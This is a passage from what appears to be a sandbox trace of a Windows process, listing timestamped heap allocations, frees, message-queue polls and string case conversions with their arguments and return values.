wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.667] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.667] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.667] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.667] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.667] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.667] FreeLibrary (hLibModule=0x74d40000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.668] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.668] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.668] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.669] CloseHandle (hObject=0x2cc) returned 1 [0256.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0256.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.671] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.672] CloseHandle (hObject=0x1f8) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.675] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0256.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0256.680] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.680] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0256.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 